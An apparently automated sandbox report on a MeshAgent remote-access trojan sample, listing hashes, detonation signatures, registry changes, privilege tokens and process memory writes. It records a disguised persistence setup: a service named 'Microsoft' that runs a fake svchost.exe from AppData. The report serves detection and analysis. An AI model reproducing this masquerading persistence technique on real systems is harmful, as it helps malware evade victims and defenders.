Malware Analysis Report

2024-10-19 07:44

Sample ID 241012-hv884syhqh
Target 2024-10-12_8fd2994edebc3a3ddde2a14b3f5c4183_hijackloader_poet-rat_snatch
SHA256 c4c71ad59b09f47d5d8c1f1ba54a358d1793706f00651867fb171e8f4d2912b4
Tags
meshagent backdoor discovery execution persistence rat trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

c4c71ad59b09f47d5d8c1f1ba54a358d1793706f00651867fb171e8f4d2912b4

Threat Level: Known bad

The file 2024-10-12_8fd2994edebc3a3ddde2a14b3f5c4183_hijackloader_poet-rat_snatch was found to be: Known bad.

Malicious Activity Summary

meshagent backdoor discovery execution persistence rat trojan upx

MeshAgent

Detects MeshAgent payload

Downloads MZ/PE file

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Sets service image path in registry

Executes dropped EXE

Checks installed software on the system

Drops file in System32 directory

UPX packed file

Unsigned PE

Program crash

System Location Discovery: System Language Discovery

Suspicious use of WriteProcessMemory

Modifies data under HKEY_USERS

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-12 07:04

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-12 07:04

Reported

2024-10-12 07:07

Platform

win7-20240903-en

Max time kernel

118s

Max time network

119s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2024-10-12_8fd2994edebc3a3ddde2a14b3f5c4183_hijackloader_poet-rat_snatch.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\2024-10-12_8fd2994edebc3a3ddde2a14b3f5c4183_hijackloader_poet-rat_snatch.exe

"C:\Users\Admin\AppData\Local\Temp\2024-10-12_8fd2994edebc3a3ddde2a14b3f5c4183_hijackloader_poet-rat_snatch.exe"

Network

N/A

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-12 07:04

Reported

2024-10-12 07:07

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

142s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2024-10-12_8fd2994edebc3a3ddde2a14b3f5c4183_hijackloader_poet-rat_snatch.exe"

Signatures

Detects MeshAgent payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

MeshAgent

rat trojan backdoor meshagent

Downloads MZ/PE file

Sets service image path in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Microsoft\ImagePath = "\"C:\\Users\\Admin\\AppData\\local\\svchost\\svchost.exe\" --meshServiceName=\"Microsoft\"" C:\Users\Admin\AppData\local\svchost\svchost.exe N/A

Checks installed software on the system

discovery

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\combase.pdb C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dll\ws2_32.pdb C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dll\bcryptprimitives.pdb C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\kernelbase.pdb C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\crypt32.pdb C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\6F20C0854D11B015FEDD40C59EF0A2A2E0285DD3 C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\advapi32.pdb C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\win32u.pdb C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\ole32.pdb C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\bcrypt.pdb C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\Kernel.Appcore.pdb C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dll\Kernel.Appcore.pdb C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\exe\svchost.pdb C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\ntdll.pdb C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\kernelbase.pdb C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\advapi32.pdb C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dll\advapi32.pdb C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\rpcrt4.pdb C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\crypt32.pdb C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\combase.pdb C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\svchost.pdb C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\kernel32.pdb C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\DLL\iphlpapi.pdb C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\DLL\bcrypt.pdb C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\shcore.pdb C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\shcore.pdb C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dll\shell32.pdb C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\iphlpapi.pdb C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\rpcrt4.pdb C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dll\crypt32.pdb C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\shell32.pdb C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\gdiplus.pdb C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\622B9A99354424DAA4C2EB7967BD870CBE07C969 C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\ntdll.pdb C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dll\kernelbase.pdb C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\shell32.pdb C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\msvcrt.pdb C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dll\gdi32full.pdb C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\win32u.pdb C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dbghelp.pdb C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\ncrypt.pdb C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\DLL\dbgcore.pdb C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\AD743BF6CD010272FEF925B0B1EE6A8A05B70C73 C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\sechost.pdb C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\ucrtbase.pdb C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dll\comctl32.pdb C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\dbghelp.pdb C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\622B9A99354424DAA4C2EB7967BD870CBE07C969 C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\msvcrt.pdb C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\user32.pdb C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dll\combase.pdb C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dll\dbghelp.pdb C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dll\gdiplus.pdb C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dll\ntasn1.pdb C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dll\sechost.pdb C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\msvcp_win.pdb C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\gdi32.pdb C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dll\msvcp_win.pdb C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\ole32.pdb C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\Kernel.Appcore.pdb C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dll\ucrtbase.pdb C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dll\gdi32.pdb C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dll\ole32.pdb C:\Users\Admin\AppData\local\svchost\svchost.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\_가이아서버 접속기.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133731902928711239" C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Users\Admin\AppData\local\svchost\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4588 wrote to memory of 3636 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-12_8fd2994edebc3a3ddde2a14b3f5c4183_hijackloader_poet-rat_snatch.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4588 wrote to memory of 3636 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-12_8fd2994edebc3a3ddde2a14b3f5c4183_hijackloader_poet-rat_snatch.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4588 wrote to memory of 4564 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-12_8fd2994edebc3a3ddde2a14b3f5c4183_hijackloader_poet-rat_snatch.exe C:\Windows\system32\cmd.exe
PID 4588 wrote to memory of 4564 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-12_8fd2994edebc3a3ddde2a14b3f5c4183_hijackloader_poet-rat_snatch.exe C:\Windows\system32\cmd.exe
PID 4564 wrote to memory of 3564 N/A C:\Windows\system32\cmd.exe C:\Windows\explorer.exe
PID 4564 wrote to memory of 3564 N/A C:\Windows\system32\cmd.exe C:\Windows\explorer.exe
PID 3636 wrote to memory of 764 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3636 wrote to memory of 764 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3388 wrote to memory of 60 N/A C:\Windows\explorer.exe C:\Users\Admin\AppData\Local\Temp\_가이아서버 접속기.exe
PID 3388 wrote to memory of 60 N/A C:\Windows\explorer.exe C:\Users\Admin\AppData\Local\Temp\_가이아서버 접속기.exe
PID 3388 wrote to memory of 60 N/A C:\Windows\explorer.exe C:\Users\Admin\AppData\Local\Temp\_가이아서버 접속기.exe
PID 3636 wrote to memory of 376 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3636 wrote to memory of 376 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3636 wrote to memory of 2368 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3636 wrote to memory of 2368 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3636 wrote to memory of 3176 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3636 wrote to memory of 3176 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3636 wrote to memory of 1480 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3636 wrote to memory of 1480 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1480 wrote to memory of 3284 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\local\svchost\svchost.exe
PID 1480 wrote to memory of 3284 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\local\svchost\svchost.exe
PID 668 wrote to memory of 4340 N/A C:\Users\Admin\AppData\local\svchost\svchost.exe C:\Windows\System32\wbem\wmic.exe
